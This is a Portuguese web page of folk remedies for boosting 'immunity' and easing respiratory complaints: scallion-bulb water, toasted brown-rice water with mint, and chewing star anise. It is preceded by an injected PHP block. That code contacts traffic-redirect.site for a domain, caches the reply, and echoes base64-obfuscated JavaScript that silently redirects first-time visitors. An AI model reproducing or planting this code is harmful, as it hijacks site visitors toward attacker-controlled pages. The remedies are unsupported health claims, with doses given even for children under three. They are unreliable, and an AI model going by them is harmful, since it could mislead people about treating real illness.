$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Recursos para potencialização da imunidade – Site de leitura_novo

Qualificação funcional dos Sistemas Imunológico (Sistema de Manutenção da Integridade Pessoal) e Respiratório (Sistema de Sustentação dos Processos Vitais e de Composição da Interação) – sugestões

 

→ Recurso para potencialização da imunidade: Água do Bulbo da Cebolinha Verde (Allium fistulosumNutriente do Senso de Direção e da Disposição para o Passo Adiante)

Preparo: com um instrumento que não seja de metal, cortar um bulbo de cebolinha verde em rodelas bem finas (quase transparente), e coloca-las em 200 ml de água natural e na temperatura ambiente. Cobrir com um pano branco e fino, e deixar em repouso por 30 minutos.

Forma de uso: para indivíduos adultos, coar ou não (seguir a vontade do coração), e sorver a solução, distribuindo as sorveduras ao longo de um período de uma hora. Para adolescentes, coar ou não, e sorver a metade da solução, distribuindo as sorveduras ao longo de um período de uma hora. Para as crianças que cursam a segunda infância e os idosos, coar a solução e ministrar duas colheres de sopa do líquido, com um intervalo de uma hora entre uma colherada e a outra. Para os indivíduos com idade inferior a 3 anos, coar a solução, e ministrar duas doses de apenas três gotas do líquido, com um intervalo de uma hora entre elas. Nas situações de uso com o intento preventivo, manter a dosagem por três dias seguidos. Na presença de sintomas, repetir por dez dias seguidos, mantendo a dosagem mesmo que na ausência de sintomas. Nos quadros mais severos, manter a programação por dezessete dias consecutivos.

 

 

→ Recurso para reparação dos estados de debilidade, ganho de imunidade (2) e revitalização sanguínea: Água de Arroz Integral Torrado e Hortelã

Preparo: deitar duas colheres de sopa bem cheias de arroz integral não lavado em uma panela já quente (sem óleo, azeite, água ou manteiga), e deixar “pipocar” até a produção de fumaça. Tirar do fogo, e, com cuidado banhar com 70 a 80 ml (2/3 de um copo de 200 ml) de água mineral ou filtrada na temperatura ambiente. Aguardar pela liberação de toda a fumaça e respingos (reação do contato da água com o fundo quente da panela), e acrescentar três folhas frescas de hortelã e seus cabos picados. Tampar, deixar até que a mistura alcance a temperatura morna, e passar por peneira fina.

Forma de uso: ingerir o produto filtrado, em pequenos goles ministrados a cada vinte minutos. Realizar uma dose diária, por até três dias seguidos. A ingestão contínua não é indicada. Nas situações de acamamento prolongado e/ou de fragilidade física crônica, intervalar os blocos de até três dias com períodos de três semanas ou ministrar cinco doses em dias alternados.

 

 

→ Recurso promotor do desenvolvimento do poder de expressão, do exercício da manifestação segundo os sentires e os jeitos próprios ou o estar do momento, e da reparação da tendência à prática predominante das atuações programadas, preconizadas, encomendadas e/ou ensaiadas – temas relacionados aos quadros respiratórios: mastigação morosa, c/ deglutição apenas da saliva, em dois momentos do dia, por um mínimo de dez dias seguidos, de uma vagem seca do anis-estrelado (Illicium verumPrincípio Promotor da Expressão Autêntica).